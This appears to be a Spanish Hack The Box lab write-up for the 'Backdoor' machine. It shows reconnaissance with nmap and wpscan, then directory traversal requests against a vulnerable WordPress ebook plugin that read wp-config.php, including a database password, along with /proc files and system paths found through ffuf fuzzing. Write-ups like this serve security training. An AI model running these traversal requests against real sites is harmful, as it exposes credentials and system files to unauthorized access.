This page looks best with JavaScript enabled

Hack The Box - Backdoor

 •  ✍️ sckull
featured image

Backdoor corre WordPress con un plugin vulnerable lo que nos permitió obtener información de los procesos en ejecución, encontramos que corre un servidor de gdb por donde accedimos a un primer usuario. Tras conectarnos a una sesion screen logramos acceso como root.

Nombre Backdoor box_img_maker
OS

Linux

Puntos 20
Dificultad Facil
IP 10.10.11.125
Maker

hkabubaker17
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[5.7, 4.3, 4.7, 5.3, 5.7],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos: SSH (22), HTTP (80) y waste? (1337).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

# Nmap 7.91 scan initiated Sat Nov 20 21:17:54 2021 as: nmap -p22,80,1337 -sC -sV -o nmap backdoor.htb
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.085s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 20 21:18:17 2021 -- 1 IP address (1 host up) scanned in 22.78 seconds

Web Site

Una solicitud de curl nos muestra en los headers algunas direcciones que pertenecen a WordPress.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/backdoor ❯ curl -sI 10.10.11.125
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 03:57:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Link: <http://10.10.11.125/index.php/wp-json/>; rel="https://api.w.org/"
Link: <http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate"; type="application/json"
Link: <http://10.10.11.125/>; rel=shortlink
Content-Type: text/html; charset=UTF-8

 π ~/htb/backdoor ❯

Al visitar la pagina vemos que efectivamente es un WordPress, y no muestra mayor informacion.
image

WordPress

Enumeramos los plugins con la opcion por default aunque no mostró nada inicialmente, por lo que cambiamos a deteccion mixta, aún asi solo muestra el plugin akismet en su version 4.2.1. Además la versión de Wordpress (5.8.1) no parece ser vulnerable.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100

 π ~/htb/backdoor ❯ wpscan --url http://10.10.11.125/ -e p --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sun Nov 28 03:39:14 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:26 <==========================================================================================================> (1499 / 1499) 100.00% Time: 00:00:26
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.11.125/wp-content/plugins/akismet/
 | Latest Version: 4.2.1
 | Last Updated: 2021-10-01T18:28:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 28 03:39:43 2021
[+] Requests Done: 1505
[+] Cached Requests: 36
[+] Data Sent: 412.582 KB
[+] Data Received: 269.619 KB
[+] Memory used: 260 MB
[+] Elapsed time: 00:00:29
 π ~/htb/backdoor ❯

Directory Traversal

El plugin akismet no parece tener algun tipo de vulnerabilidad, aún asi, en la carpeta o directorio de plugins se muestra ebook-download.
image

Si accedemos al readme.txt vemos que permite la descarga de archivos. Al investigar un poco acerca de este plugin encontramos que permite acceder a cualquier directorio de la maquina. Si realizamos una solicitud con curl el resultado es el archivo wp-config.php donde vemos las credenciales de la base de datos de WordPress.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

 π ~/htb/backdoor  curl -s "10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"|grep -v "*"
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php

define( 'DB_NAME', 'wordpress' );

define( 'DB_USER', 'wordpressuser' );

define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

define( 'DB_HOST', 'localhost' );

define( 'DB_CHARSET', 'utf8' );

define( 'DB_COLLATE', '' );


if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');

define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );


$table_prefix = 'wp_';

define( 'WP_DEBUG', false );





if ( ! defined( 'ABSPATH' ) ) {
   define( 'ABSPATH', __DIR__ . '/' );
}

require_once ABSPATH . 'wp-settings.php';
<script>window.close()</script>
 π ~/htb/backdoor

Sabiendo que podemos acceder a cualquier archivo de la maquina utilizamos un wordlist para enumerar los archivos e informacion sensible.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

 π ~/htb/backdoor ❯ ffuf -c -w LFI_paths.txt -u "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ
 :: Wordlist         : FUZZ: LFI_paths.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 1
________________________________________________

/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 1072, Words: 115, Lines: 25]
/etc/apache2/mods-available/ssl.conf [Status: 200, Size: 3339, Words: 431, Lines: 86]
/etc/apache2/ports.conf [Status: 200, Size: 510, Words: 36, Lines: 16]
/etc/apache2/mods-available/setenvif.conf [Status: 200, Size: 1524, Words: 113, Lines: 33]
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 981, Words: 82, Lines: 30]
/etc/apache2/mods-available/proxy.conf [Status: 200, Size: 1057, Words: 124, Lines: 28]
/etc/apache2/mods-available/mime.conf [Status: 200, Size: 7908, Words: 943, Lines: 252]
/etc/bash.bashrc        [Status: 200, Size: 2488, Words: 399, Lines: 72]
/etc/ca-certificates.conf [Status: 200, Size: 6766, Words: 64, Lines: 161]
/etc/ca-certificates.conf.dpkg-old [Status: 200, Size: 6792, Words: 64, Lines: 161]
/etc/apache2/mods-available/dir.conf [Status: 200, Size: 386, Words: 15, Lines: 6]
/etc/crontab            [Status: 200, Size: 1199, Words: 181, Lines: 23]
/etc/crypttab           [Status: 200, Size: 214, Words: 5, Lines: 2]
[.. snip ..]
/proc/cpuinfo           [Status: 200, Size: 2354, Words: 271, Lines: 57]
/proc/devices           [Status: 200, Size: 711, Words: 97, Lines: 61]
/proc/meminfo           [Status: 200, Size: 1635, Words: 515, Lines: 54]
/proc/net/tcp           [Status: 200, Size: 1210, Words: 369, Lines: 8]
/proc/net/udp           [Status: 200, Size: 544, Words: 101, Lines: 4]
/proc/self/stat         [Status: 200, Size: 483, Words: 52, Lines: 2]
/proc/self/mounts       [Status: 200, Size: 2841, Words: 181, Lines: 37]
/proc/self/status       [Status: 200, Size: 1524, Words: 93, Lines: 56]
/proc/version           [Status: 200, Size: 310, Words: 17, Lines: 2]
/usr/share/adduser/adduser.conf [Status: 200, Size: 3242, Words: 402, Lines: 89]
/var/www/html/wp-config.php [Status: 200, Size: 3971, Words: 484, Lines: 113]
:: Progress: [1014/1014] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
 π ~/htb/backdoor ❯

User - User

Proc - Enumeration

Archivos de configuracion no mostraron mucha información, pero vemos /proc e investigando acerca de estos archivos, especificamente de net/tcp vemos que es posible decodificar su contenido y ver que puertos estan a la escucha localmente. Utilizando un script de perl vemos que existe el puerto 1337 aun asi este puerto no muestra ninguna informacion al conectarnos con netcat pero aún asi aparece abierto en nmap.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

 π ~/htb/backdoor ❯ cat tcp_proc
   sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 31157 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 32750 1 0000000000000000 100 0 0 10 0
   2: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 35407 1 0000000000000000 100 0 0 10 0
   3: 0100007F:8124 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36357 1 0000000000000000 100 0 0 10 0
   4: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36359 1 0000000000000000 100 0 0 10 0
   5: 7D0B0A0A:D15E 01010101:0035 02 00000001:00000000 01:00000000 00000002   101        0 41859 2 0000000000000000 400 0 0 1 7
 π ~/htb/backdoor ❯ cat tcp_proc| cut -d ' ' -f5| tr ':' ' ' | tail --lines +2 > local_address
 π ~/htb/backdoor ❯ while read line; do echo "./proc_net.pl $line"|bash; done < local_address
hex: 3500007F
IP: 127.0.0.53  PORT: 53
hex: 00000000
IP: 0.0.0.0  PORT: 22
hex: 00000000
IP: 0.0.0.0  PORT: 1337
hex: 0100007F
IP: 127.0.0.1  PORT: 33060
hex: 0100007F
IP: 127.0.0.1  PORT: 3306
hex: 7D0B0A0A
IP: 10.10.11.125  PORT: 53598
 π ~/htb/backdoor ❯
  π ~/htb/backdoor ❯ nc 10.10.11.125 1337 -vvv
backdoor.htb [10.10.11.125] 1337 (?) open
^C sent 0, rcvd 0
 π ~/htb/backdoor ❯ nmap -p 1337 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 04:24 UTC
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.075s latency).

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
 π ~/htb/backdoor ❯

Investigando un poco más sobre Directory Traversal encontramos un post que explica que es posible obtener informacion leyendo los archivos /proc los cuales pueden tener mucha informacion acerca de los procesos en ejecucion, variables, directorios, configuracion, etc. Inicialmente obtuvimos el archivo /proc/sched_debug el cual nos mostró todos los procesos incluyendo el PID de cada uno de estos (full output en pestaña 2), vemos algunos interesantes, como cron, sh, sleep y true.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

          task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       519.671425      3021   120         0.000000      1440.110160         0.000000 0 0 /autogroup-2
 S       kthreadd     2     19854.750146       289   120         0.000000         3.772400         0.000000 0 0 /
[.. snip ..]
 S  rs:main Q:Reg   843        65.688422      2311   120         0.000000        82.416140         0.000000 0 0 /autogroup-44
 S systemd-logind   772        51.786524       353   120         0.000000        57.482730         0.000000 0 0 /autogroup-43
 S           cron   795        23.500787        86   120         0.000000         9.187460         0.000000 0 0 /autogroup-53
 S           cron   797         4.951889        22   120         0.000000         2.347230         0.000000 0 0 /autogroup-53
 S           cron   798         4.063958        28   120         0.000000         1.866590         0.000000 0 0 /autogroup-53
 S             sh   822         6.096762         3   120         0.000000         0.875700         0.000000 0 0 /autogroup-63
 S            atd   831         0.698262         5   120         0.000000         1.947490         0.000000 0 0 /autogroup-65
 S        apache2   919       503.996756      4080   120         0.000000       204.206630         0.000000 0 0 /autogroup-78
 S        polkitd   952         0.967613        45   120         0.000000         6.252250         0.000000 0 0 /autogroup-79
 S          gmain   957         0.219552         2   120         0.000000         0.054380         0.000000 0 0 /autogroup-79
 S          gdbus   959         2.391570        30   120         0.000000         2.256970         0.000000 0 0 /autogroup-79
 S         mysqld   982      1454.947024       201   120         0.000000       950.670570         0.000000 0 0 /autogroup-82
 S     ib_io_wr-1   999      2132.449254      8058   120         0.000000       147.278470         0.000000 0 0 /autogroup-82
 S     ib_io_wr-2  1000      2132.434954      8073   120         0.000000       100.577020         0.000000 0 0 /autogroup-82
 S ib_pg_flush_co  1003      2132.461204      4153   120         0.000000       146.851890         0.000000 0 0 /autogroup-82
 Sib_log_fl_notif  1005      2138.469534     40602   120         0.000000       761.835450         0.000000 0 0 /autogroup-82
 S   ib_log_flush  1006      2132.462634     40721   120         0.000000       525.424850         0.000000 0 0 /autogroup-82
 Sib_log_wr_notif  1007      2132.459704     40597   120         0.000000       698.855610         0.000000 0 0 /autogroup-82
 S  ib_log_writer  1008      2132.484224     40629   120         0.000000       531.424940         0.000000 0 0 /autogroup-82
 S ib_srv_lock_to  1029      2132.404864      4002   120         0.000000        85.624910         0.000000 0 0 /autogroup-82
 S ib_srv_err_mon  1030      2132.395744      4001   120         0.000000        79.468610         0.000000 0 0 /autogroup-82
 S    ib_src_main  1033      2132.532934      4003   120         0.000000       268.500730         0.000000 0 0 /autogroup-82
 S  ib_dict_stats  1034      2132.340934       401   120         0.000000        11.093740         0.000000 0 0 /autogroup-82
 S     ib_fts_opt  1035      2132.366374       802   120         0.000000        22.894900         0.000000 0 0 /autogroup-82
 S   xpl_worker-1  1038      2122.324314        67   120         0.000000         1.556280         0.000000 0 0 /autogroup-82
 S   xpl_worker-2  1039      2122.327704        67   120         0.000000         0.984690         0.000000 0 0 /autogroup-82
 S   xpl_accept-1  1040      1256.510815         3   120         0.000000         0.024590         0.000000 0 0 /autogroup-82
 S    ib_buf_dump  1044      1224.615357         4   120         0.000000         0.996910         0.000000 0 0 /autogroup-82
 S  ib_clone_gtid  1045      2132.469694     40000   120         0.000000       698.268460         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-3  1049      1473.419354       381   120         0.000000        16.402710         0.000000 0 0 /autogroup-82
 S      evt_sched  1050      1258.486107         1   120         0.000000         0.555790         0.000000 0 0 /autogroup-82
 S    sig_handler  1051      1272.678439         4   120         0.000000         0.045260         0.000000 0 0 /autogroup-82
 S   xpl_accept-2  1052      2132.400884      4487   120         0.000000       140.123980         0.000000 0 0 /autogroup-82
 S       gtid_zip  1054      1272.680619         2   120         0.000000         0.173790         0.000000 0 0 /autogroup-82
 S     connection  2745      1456.449824       263   120         0.000000        77.094580         0.000000 0 0 /autogroup-82
 S     connection  2746      1466.696594       424   120         0.000000        67.397070         0.000000 0 0 /autogroup-82
 I kworker/u256:1  3732     20371.992915      8245   120         0.000000       177.224550         0.000000 0 0 /
 S        apache2  4991       487.566296        35   120         0.000000        14.617150         0.000000 0 0 /autogroup-78
 S        apache2  5001       495.637356        29   120         0.000000        13.318640         0.000000 0 0 /autogroup-78
 S        apache2  5002       493.276976        30   120         0.000000        11.690060         0.000000 0 0 /autogroup-78
 S        apache2  5006       493.332166        28   120         0.000000         8.924860         0.000000 0 0 /autogroup-78
 S        apache2  5015       487.958556        25   120         0.000000        10.375860         0.000000 0 0 /autogroup-78
 S        apache2  5027       487.279166        25   120         0.000000         7.637470         0.000000 0 0 /autogroup-78
 I    kworker/1:2  9006     20397.858690      7396   120         0.000000       488.829440         0.000000 0 0 /
 I kworker/u256:0  9394     20397.344230      1827   120         0.000000        35.668860         0.000000 0 0 /
 t           true  9964        11.181754         5   120         0.000000         0.892650         0.000000 0 0 /autogroup-97
 I    kworker/1:1  9970     19866.729543         2   120         0.000000         0.002290         0.000000 0 0 /
 S          sleep 11031     31681.982737         1   120         0.000000         0.917290         0.000000 0 0 /autogroup-56

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574

 π ~/htb/backdoor ❯ curl -s "10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../..//proc/sched_debug"
../../../../../../..//proc/sched_debug../../../../../../..//proc/sched_debug../../../../../../..//proc/sched_debugSched Debug Version: v0.11, 5.4.0-80-generic #90-Ubuntu
ktime                                   : 3887966.407279
sched_clk                               : 3888584.275900
cpu_clk                                 : 3888056.881740
jiffies                                 : 4295864257
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 2059067
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2000.000 MHz
  .nr_running                    : 0
  .nr_switches                   : 557787
  .nr_load_updates               : 0
  .nr_uninterruptible            : 2
  .next_balance                  : 4295.864258
  .curr->pid                     : 0
  .clock                         : 3888055.451240
  .clock_task                    : 3888055.451240
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/autogroup-82
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 775.934870
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14923.580373
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887928.649480
  .se->vruntime                  : 15693.626750
  .se->sum_exec_runtime          : 2563.378530
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-78
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 761.651623
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14937.863620
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887655.471120
  .se->vruntime                  : 15693.532393
  .se->sum_exec_runtime          : 1016.615180
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-36
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 1046.948344
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14652.566899
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887803.723600
  .se->vruntime                  : 15693.548413
  .se->sum_exec_runtime          : 1015.887610
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 15699.515243
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 1
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.033390
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 I         rcu_gp     3        13.968173         2   100         0.000000         0.003890         0.000000 0 0 /
 I     rcu_par_gp     4        15.968234         2   100         0.000000         0.002150         0.000000 0 0 /
 I   kworker/0:0H     6      2934.228300         4   100         0.000000         0.022430         0.000000 0 0 /
 I   mm_percpu_wq     9        22.038051         2   100         0.000000         0.000710         0.000000 0 0 /
 S    ksoftirqd/0    10     15693.524383       799   120         0.000000        29.860830         0.000000 0 0 /
 I      rcu_sched    11     15693.777743     91101   120         0.000000       961.631970         0.000000 0 0 /
